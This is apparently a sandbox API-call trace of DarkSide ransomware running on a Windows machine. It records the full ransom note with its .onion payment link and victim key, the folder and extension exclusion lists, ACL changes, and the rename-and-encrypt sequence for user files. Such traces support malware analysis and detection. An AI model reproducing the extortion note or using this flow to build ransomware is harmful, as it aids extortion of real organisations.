[0160.586] wcslen (_String="tor browser") returned 0xb [0160.586] _wcsicmp (_Str1="windows.old", _Str2="WvRAl") returned -13 [0160.587] wcslen (_String="windows.old") returned 0xb [0160.587] _wcsicmp (_Str1="intel", _Str2="WvRAl") returned -14 [0160.587] wcslen (_String="intel") returned 0x5 [0160.587] _wcsicmp (_Str1="msocache", _Str2="WvRAl") returned -10 [0160.587] wcslen (_String="msocache") returned 0x8 [0160.587] _wcsicmp (_Str1="perflogs", _Str2="WvRAl") returned -7 [0160.587] wcslen (_String="perflogs") returned 0x8 [0160.587] _wcsicmp (_Str1="x64dbg", _Str2="WvRAl") returned 1 [0160.587] wcslen (_String="x64dbg") returned 0x6 [0160.587] _wcsicmp (_Str1="public", _Str2="WvRAl") returned -7 [0160.587] wcslen (_String="public") returned 0x6 [0160.587] _wcsicmp (_Str1="all users", _Str2="WvRAl") returned -22 [0160.587] wcslen (_String="all users") returned 0x9 [0160.587] _wcsicmp (_Str1="default", _Str2="WvRAl") returned -19 [0160.587] wcslen (_String="default") returned 0x7 [0160.587] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*" [0160.587] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*") returned 0x30 [0160.587] wcscpy (in: _Dest=0x32200ae, _Source="WvRAl" | out: _Dest="WvRAl") returned="WvRAl" [0160.587] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0160.587] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0160.588] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" [0160.588] GetNamedSecurityInfoW () returned 0x0 [0160.588] SetEntriesInAclW () returned 0x0 [0160.588] SetNamedSecurityInfoW () returned 0x0 [0160.591] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22bd48) returned 1 [0160.591] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e66c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0160.591] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral")) returned 1 [0160.591] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0160.591] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0160.593] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e63c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e63c*=0x7ca, lpOverlapped=0x0) returned 1 [0160.594] CloseHandle (hObject=0x1bc) returned 1 [0160.594] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0160.594] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral")) returned 0x10 [0160.594] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\") returned="" [0160.594] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\") returned 0x35 [0160.603] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\*", fInfoLevelId=0x0, lpFindFileData=0x32e89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e89c) returned 0x1541c8 [0160.603] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73382c80, ftCreationTime.dwHighDateTime=0x1d5e3d8, ftLastAccessTime.dwLowDateTime=0x8d6aad20, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8d6aad20, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.607] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27f88530, ftCreationTime.dwHighDateTime=0x1d5e11c, ftLastAccessTime.dwLowDateTime=0xf76d3a00, ftLastAccessTime.dwHighDateTime=0x1d5df86, ftLastWriteTime.dwLowDateTime=0xf76d3a00, ftLastWriteTime.dwHighDateTime=0x1d5df86, nFileSizeHigh=0x0, nFileSizeLow=0x6753, dwReserved0=0x0, dwReserved1=0x0, cFileName="-2PF.m4a", cAlternateFileName="")) returned 1 [0160.607] _wcsicmp (_Str1="-2PF.m4a", _Str2="README.c06622a1.TXT") returned -69 [0160.607] wcsstr (_Str="-2PF.m4a", _SubStr="README") returned 0x0 [0160.607] _wcsicmp (_Str1="autorun.inf", _Str2="-2PF.m4a") returned 52 [0160.607] wcslen (_String="autorun.inf") returned 0xb [0160.607] _wcsicmp (_Str1="boot.ini", _Str2="-2PF.m4a") returned 53 [0160.607] wcslen (_String="boot.ini") returned 0x8 [0160.607] _wcsicmp (_Str1="bootfont.bin", _Str2="-2PF.m4a") returned 53 [0160.607] wcslen (_String="bootfont.bin") returned 0xc [0160.607] _wcsicmp (_Str1="bootsect.bak", _Str2="-2PF.m4a") returned 53 [0160.607] wcslen (_String="bootsect.bak") returned 0xc [0160.607] _wcsicmp (_Str1="desktop.ini", _Str2="-2PF.m4a") returned 55 [0160.607] wcslen (_String="desktop.ini") returned 0xb [0160.608] _wcsicmp (_Str1="iconcache.db", _Str2="-2PF.m4a") returned 60 [0160.608] wcslen (_String="iconcache.db") returned 0xc [0160.608] _wcsicmp (_Str1="ntldr", _Str2="-2PF.m4a") returned 65 [0160.608] wcslen (_String="ntldr") returned 0x5 [0160.608] _wcsicmp (_Str1="ntuser.dat", _Str2="-2PF.m4a") returned 65 [0160.608] wcslen (_String="ntuser.dat") returned 0xa [0160.608] _wcsicmp (_Str1="ntuser.dat.log", _Str2="-2PF.m4a") returned 65 [0160.608] wcslen (_String="ntuser.dat.log") returned 0xe [0160.608] _wcsicmp (_Str1="ntuser.ini", _Str2="-2PF.m4a") returned 65 [0160.608] wcslen (_String="ntuser.ini") returned 0xa [0160.608] _wcsicmp (_Str1="thumbs.db", _Str2="-2PF.m4a") returned 71 [0160.608] wcslen (_String="thumbs.db") returned 0x9 [0160.608] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0160.608] wcslen (_String="386") returned 0x3 [0160.608] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0160.608] wcslen (_String="adv") returned 0x3 [0160.608] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0160.608] wcslen (_String="ani") returned 0x3 [0160.608] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0160.608] wcslen (_String="bat") returned 0x3 [0160.608] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0160.608] wcslen (_String="bin") returned 0x3 [0160.608] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0160.608] wcslen (_String="cab") returned 0x3 [0160.608] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0160.608] wcslen (_String="cmd") returned 0x3 [0160.608] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0160.608] wcslen (_String="com") returned 0x3 [0160.608] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0160.608] wcslen (_String="cpl") returned 0x3 [0160.608] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0160.608] wcslen (_String="cur") returned 0x3 [0160.608] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0160.609] wcslen (_String="deskthemepack") returned 0xd [0160.609] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0160.609] wcslen (_String="diagcab") returned 0x7 [0160.609] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0160.609] wcslen (_String="diagcfg") returned 0x7 [0160.609] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0160.609] wcslen (_String="diagpkg") returned 0x7 [0160.609] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0160.609] wcslen (_String="dll") returned 0x3 [0160.609] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0160.609] wcslen (_String="drv") returned 0x3 [0160.609] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0160.609] wcslen (_String="exe") returned 0x3 [0160.609] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0160.609] wcslen (_String="hlp") returned 0x3 [0160.609] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0160.609] wcslen (_String="icl") returned 0x3 [0160.609] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0160.609] wcslen (_String="icns") returned 0x4 [0160.609] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0160.609] wcslen (_String="ico") returned 0x3 [0160.609] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0160.609] wcslen (_String="ics") returned 0x3 [0160.609] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0160.609] wcslen (_String="idx") returned 0x3 [0160.609] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0160.609] wcslen (_String="ldf") returned 0x3 [0160.609] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0160.609] wcslen (_String="lnk") returned 0x3 [0160.609] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0160.609] wcslen (_String="mod") returned 0x3 [0160.609] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0160.609] wcslen (_String="mpa") returned 0x3 [0160.609] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0160.609] wcslen (_String="msc") returned 0x3 [0160.609] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0160.609] wcslen (_String="msp") returned 0x3 [0160.610] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0160.610] wcslen (_String="msstyles") returned 0x8 [0160.610] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0160.610] wcslen (_String="msu") returned 0x3 [0160.610] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0160.610] wcslen (_String="nls") returned 0x3 [0160.610] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0160.610] wcslen (_String="nomedia") returned 0x7 [0160.610] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0160.610] wcslen (_String="ocx") returned 0x3 [0160.610] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0160.610] wcslen (_String="prf") returned 0x3 [0160.610] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0160.610] wcslen (_String="ps1") returned 0x3 [0160.610] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0160.610] wcslen (_String="rom") returned 0x3 [0160.610] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0160.610] wcslen (_String="rtp") returned 0x3 [0160.610] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0160.610] wcslen (_String="scr") returned 0x3 [0160.610] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0160.610] wcslen (_String="shs") returned 0x3 [0160.610] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0160.610] wcslen (_String="spl") returned 0x3 [0160.610] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0160.610] wcslen (_String="sys") returned 0x3 [0160.610] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0160.610] wcslen (_String="theme") returned 0x5 [0160.610] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0160.610] wcslen (_String="themepack") returned 0x9 [0160.610] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0160.610] wcslen (_String="wpx") returned 0x3 [0160.610] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0160.610] wcslen (_String="lock") returned 0x4 [0160.610] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0160.610] wcslen (_String="key") returned 0x3 [0160.611] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0160.611] wcslen (_String="hta") returned 0x3 [0160.611] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0160.611] wcslen (_String="msi") returned 0x3 [0160.611] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0160.611] wcslen (_String="pdb") returned 0x3 [0160.611] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0160.611] wcslen (_String="sqlite") returned 0x6 [0160.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral")) returned 0x10 [0160.611] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0160.611] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" [0160.611] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl") returned 0x34 [0160.611] wcscpy (in: _Dest=0x32720e2, _Source="-2PF.m4a" | out: _Dest="-2PF.m4a") returned="-2PF.m4a" [0160.611] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\-2PF.m4a", dwFileAttributes=0x80) returned 1 [0160.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\-2PF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\-2pf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0160.611] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.612] ReadFile (in: hFile=0x1dc, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0160.612] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x1e5f2b6b [0160.612] RtlComputeCrc32 (PartialCrc=0x2b6b, Buffer=0x32e724, Length=0x80) returned 0x2bce4eea [0160.612] RtlComputeCrc32 (PartialCrc=0x4eea, Buffer=0x32e724, Length=0x80) returned 0x4a1cbc44 [0160.612] RtlComputeCrc32 (PartialCrc=0xbc44, Buffer=0x32e724, Length=0x80) returned 0x62840605 [0160.612] RtlComputeCrc32 (PartialCrc=0x605, Buffer=0x32e724, Length=0x80) returned 0xa0db28cd [0160.612] CloseHandle (hObject=0x1dc) returned 1 [0160.612] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0160.613] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\-2PF.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\-2PF.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\-2PF.m4a" [0160.613] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\-2PF.m4a") returned 0x3d [0160.613] wcscpy (in: _Dest=0x32820fa, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.613] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\-2PF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\-2pf.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\-2PF.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\-2pf.m4a.c06622a1"), dwFlags=0x8) returned 1 [0160.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\-2PF.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\-2pf.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1dc [0160.615] CreateIoCompletionPort (FileHandle=0x1dc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.615] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0160.622] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3a1bbc2d [0160.622] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x69a95619 [0160.622] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2bd2857e [0160.622] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x36744de7 [0160.622] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x72d3051 [0160.622] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4bc7e4f1 [0160.622] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xf0fad35 [0160.622] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50712b3b [0160.625] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0xec3218f1 [0160.625] RtlComputeCrc32 (PartialCrc=0x18f1, Buffer=0x2b70094, Length=0x80) returned 0x316e42b3 [0160.625] RtlComputeCrc32 (PartialCrc=0x42b3, Buffer=0x2b70094, Length=0x80) returned 0x2a31d8f1 [0160.625] RtlComputeCrc32 (PartialCrc=0xd8f1, Buffer=0x2b70094, Length=0x80) returned 0x824bf74e [0160.625] RtlComputeCrc32 (PartialCrc=0xf74e, Buffer=0x2b70094, Length=0x80) returned 0x212f9266 [0160.625] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0160.625] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0160.625] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.625] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a07bc0, ftCreationTime.dwHighDateTime=0x1d5d84b, ftLastAccessTime.dwLowDateTime=0xcc7eb6d0, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0xcc7eb6d0, ftLastWriteTime.dwHighDateTime=0x1d5d7b0, nFileSizeHigh=0x0, nFileSizeLow=0x1411c, dwReserved0=0x0, dwReserved1=0x0, cFileName="h6M xRQmnZv.m4a", cAlternateFileName="H6MXRQ~1.M4A")) returned 1 [0160.625] _wcsicmp (_Str1="h6M xRQmnZv.m4a", _Str2="README.c06622a1.TXT") returned -10 [0160.625] wcsstr (_Str="h6M xRQmnZv.m4a", _SubStr="README") returned 0x0 [0160.625] _wcsicmp (_Str1="autorun.inf", _Str2="h6M xRQmnZv.m4a") returned -7 [0160.625] wcslen (_String="autorun.inf") returned 0xb [0160.625] _wcsicmp (_Str1="boot.ini", _Str2="h6M xRQmnZv.m4a") returned -6 [0160.625] wcslen (_String="boot.ini") returned 0x8 [0160.626] _wcsicmp (_Str1="bootfont.bin", _Str2="h6M xRQmnZv.m4a") returned -6 [0160.626] wcslen (_String="bootfont.bin") returned 0xc [0160.626] _wcsicmp (_Str1="bootsect.bak", _Str2="h6M xRQmnZv.m4a") returned -6 [0160.626] wcslen (_String="bootsect.bak") returned 0xc [0160.626] _wcsicmp (_Str1="desktop.ini", _Str2="h6M xRQmnZv.m4a") returned -4 [0160.626] wcslen (_String="desktop.ini") returned 0xb [0160.626] _wcsicmp (_Str1="iconcache.db", _Str2="h6M xRQmnZv.m4a") returned 1 [0160.626] wcslen (_String="iconcache.db") returned 0xc [0160.626] _wcsicmp (_Str1="ntldr", _Str2="h6M xRQmnZv.m4a") returned 6 [0160.626] wcslen (_String="ntldr") returned 0x5 [0160.626] _wcsicmp (_Str1="ntuser.dat", _Str2="h6M xRQmnZv.m4a") returned 6 [0160.626] wcslen (_String="ntuser.dat") returned 0xa [0160.626] _wcsicmp (_Str1="ntuser.dat.log", _Str2="h6M xRQmnZv.m4a") returned 6 [0160.626] wcslen (_String="ntuser.dat.log") returned 0xe [0160.626] _wcsicmp (_Str1="ntuser.ini", _Str2="h6M xRQmnZv.m4a") returned 6 [0160.626] wcslen (_String="ntuser.ini") returned 0xa [0160.626] _wcsicmp (_Str1="thumbs.db", _Str2="h6M xRQmnZv.m4a") returned 12 [0160.626] wcslen (_String="thumbs.db") returned 0x9 [0160.626] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0160.626] wcslen (_String="386") returned 0x3 [0160.626] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0160.626] wcslen (_String="adv") returned 0x3 [0160.626] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0160.626] wcslen (_String="ani") returned 0x3 [0160.626] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0160.626] wcslen (_String="bat") returned 0x3 [0160.626] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0160.626] wcslen (_String="bin") returned 0x3 [0160.626] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0160.626] wcslen (_String="cab") returned 0x3 [0160.626] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0160.626] wcslen (_String="cmd") returned 0x3 [0160.626] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0160.626] wcslen (_String="com") returned 0x3 [0160.626] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0160.626] wcslen (_String="cpl") returned 0x3 [0160.626] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0160.627] wcslen (_String="cur") returned 0x3 [0160.627] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0160.627] wcslen (_String="deskthemepack") returned 0xd [0160.627] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0160.627] wcslen (_String="diagcab") returned 0x7 [0160.627] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0160.627] wcslen (_String="diagcfg") returned 0x7 [0160.627] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0160.627] wcslen (_String="diagpkg") returned 0x7 [0160.627] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0160.627] wcslen (_String="dll") returned 0x3 [0160.627] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0160.627] wcslen (_String="drv") returned 0x3 [0160.627] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0160.627] wcslen (_String="exe") returned 0x3 [0160.627] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0160.627] wcslen (_String="hlp") returned 0x3 [0160.627] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0160.627] wcslen (_String="icl") returned 0x3 [0160.627] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0160.627] wcslen (_String="icns") returned 0x4 [0160.627] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0160.627] wcslen (_String="ico") returned 0x3 [0160.627] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0160.627] wcslen (_String="ics") returned 0x3 [0160.627] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0160.627] wcslen (_String="idx") returned 0x3 [0160.627] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0160.627] wcslen (_String="ldf") returned 0x3 [0160.627] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0160.627] wcslen (_String="lnk") returned 0x3 [0160.627] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0160.627] wcslen (_String="mod") returned 0x3 [0160.627] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0160.627] wcslen (_String="mpa") returned 0x3 [0160.627] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0160.627] wcslen (_String="msc") returned 0x3 [0160.627] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0160.628] wcslen (_String="msp") returned 0x3 [0160.628] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0160.628] wcslen (_String="msstyles") returned 0x8 [0160.628] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0160.628] wcslen (_String="msu") returned 0x3 [0160.628] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0160.628] wcslen 